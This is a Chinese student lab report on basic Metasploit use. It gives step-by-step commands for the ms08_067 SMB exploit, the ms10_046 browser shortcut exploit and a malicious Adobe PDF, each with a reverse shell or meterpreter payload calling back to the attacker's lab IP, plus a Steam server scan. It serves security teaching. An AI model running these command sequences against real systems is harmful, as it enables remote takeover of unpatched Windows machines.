1. 程式人生 > >2018-2019-2 20165209 《網絡對抗技術》Exp5:MSF基礎應用

2018-2019-2 20165209 《網絡對抗技術》Exp5:MSF基礎應用

使用 掃描 總結 rev hand div 所有權 基礎 幹什麽

2018-2019-2 20165209 《網絡對抗技術》Exp5:MSF基礎應用

目錄

  • 一、基礎問題回答和實驗內容
  • 二、攻擊實例
    • 主動攻擊的實踐
      • ms08_067
        • payload/generic/shell_reverse_tcp
    • 攻擊瀏覽器的實踐
      • ms10_046
        • windows/meterpreter/reverse_tcp
    • 攻擊客戶端的實踐
      • Adobe
    • 成功應用一個輔助模塊
      • scanner/steam/server_info(唯一)
  • 三、實驗中遇到的問題及解決方案
  • 四、實驗總結

一、基礎問題回答和實驗內容

1.基礎問題回答

用自己的話解釋什麽是exploit,payload,encode.

exploit:漏洞攻擊,一個exploit程序肯定會觸發系統的一個或多個漏洞,進而程序直接獲取到目標系統的部分或所有權限。

payload:搞破壞的關鍵代碼。

encode:保證payload不出現特定字符,避免被查殺。

實驗內容

  • 任務一:一個主動攻擊實踐,如ms08_067。

  • 任務二: 一個針對瀏覽器的攻擊,如ms11_050。

  • 任務三: 一個針對客戶端的攻擊,如Adobe。

  • 任務四: 成功應用任何一個輔助模塊。

返回目錄

二、攻擊實例

1.主動攻擊實踐,實現ms08_067

靶機:Microsoft Windows 2000(192.168.1.218)
payload : generic/shell_reverse_tcp

實驗步驟

  • ==首先要把靶機和攻擊者的連接方式都改為橋接!!==

  • 輸入msfconsole打開metasploit控制臺
  • 輸入use exploit/windows/smb/ms08_067_netapi 使用ms08_067漏洞攻擊方式
  • 輸入set payload generic/shell_reverse_tcp以shell反向tcp連接為有效載荷
  • 輸入set RHOST 192.168.1.218ip為靶機的IP
  • 輸入set LHOST 192.168.1.182ip為攻擊者的IP
  • 輸入set target 0設置目標,0為無差別攻擊
  • 輸入exploit開始攻擊

技術分享圖片

返回目錄

攻擊瀏覽器實踐,ms10_046漏洞攻擊

靶機:Microsoft Windows XP SP3(English)
payload : windows/meterpreter/reverse_tcp

實驗步驟

  • 輸入use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用瀏覽器漏洞
  • 輸入set payload windows/meterpreter/reverse_tcp 選擇反向鏈接載荷
  • 輸入set SRVHOST 192.168.1.182設置服務器IP(攻擊者IP)
  • 輸入set LHOST 192.168.1.182設置攻擊者IP
  • 輸入exploit開始攻擊

技術分享圖片

  • 在win xp sp3的瀏覽器中訪問剛剛設置的服務器IPhttp://192.168.1.182彈出如下窗口

技術分享圖片

  • 同時攻擊者會開始監聽並與靶機建立連接。

技術分享圖片

  • 輸入sessions查看有多少主機被反向鏈接到攻擊者和靶機對應的序號。

  • 輸入sessions -i 2控制靶機(-i後面的數即為靶機對應的序號)

技術分享圖片

返回目錄

攻擊客戶端實踐,實現Adobe

靶機:Windows XP sp3(192.168.1.139)

實驗步驟

  • 輸入use windows/fileformat/adobe_cooltype_sing使用漏洞
  • 輸入set payload windows/meterpreter/reverse_tcp選擇攻擊載荷
  • 輸入set LHOST 192.168.1.182 為攻擊者IP
  • 輸入set FILENAME 20165209.pdf設置生成pdf文件的文件名
  • 輸入exploit 開始攻擊

技術分享圖片

  • 將生成的20165209.pdf復制到Windows XP中
  • 輸入back退出當前模塊
  • 輸入use exploit/multi/handler 進入監聽模塊
  • 輸入set payload windows/meterpreter/reverse_tcp選擇攻擊載荷
  • 輸入set LHOST 192.168.1.182為攻擊者IP
  • 輸入exploit開始攻擊
  • 在靶機中打開20165209.pdf,攻擊成功

技術分享圖片

返回目錄

成功攻擊一個輔助模塊,實現網段掃描(唯一)

靶機:

實驗步驟

  • 輸入show auxiliary查看所有的輔助模塊
  • 輸入info scanner/steam/server_info查看模塊信息,請求從服務器獲取信息,掃描範圍默認為10(從起始地址開始往後掃10個),端口固定為UDP端口27015。端口27015只是用作輸入/輸出的通信端口。

技術分享圖片

  • 輸入use scanner/steam/server_info使用漏洞
  • 輸入set RHOSTS 192.168.1.180為起始IP
  • 輸入exploit開始攻擊
    (果不其然,這個網段裏木有服務器,sang~)

技術分享圖片

返回目錄

三、實驗中遇到的問題及解決方案

1.armitage無法開啟,出現錯誤提示如下圖

技術分享圖片

  • 參考了一篇博客裏面解釋了很多,具體的操作如下

1 輸入 /etc/init.d/postgresql?start 啟動postgresql數據庫;

2 輸入 msfdb?init 初始化MSF數據庫(關鍵步驟);

3 輸入 msfconsole 運行msfconsole;

#4 輸入 db_status 在msf中查看數據庫連接狀態。

  • 在顯示Connected to msf. Connection type: postgresql.之後,再次輸入armitage即可開啟成功。

返回目錄

四、實驗總結

1.實驗總結與體會

實驗最痛苦的就是明明和大家做的一樣,但是我的就是無法攻擊成功。通過實驗掌握了msf的簡單操作,始終牢記不懂就help,不知道是幹什麽的就info,看不懂就有道的宗旨,還是有些收獲的,有些快樂。

2.離實戰還缺些什麽技術

覺得差的也不多,也就一個大神的距離吧。通過在網絡上捕包反查IP,並且攻擊。類似這種步驟中的功能,我目前只能在已知的情況下,進行強迫式攻擊(就是硬生生讓舍友拷一下)。

返回目錄

2018-2019-2 20165209 《網絡對抗技術》Exp5:MSF基礎應用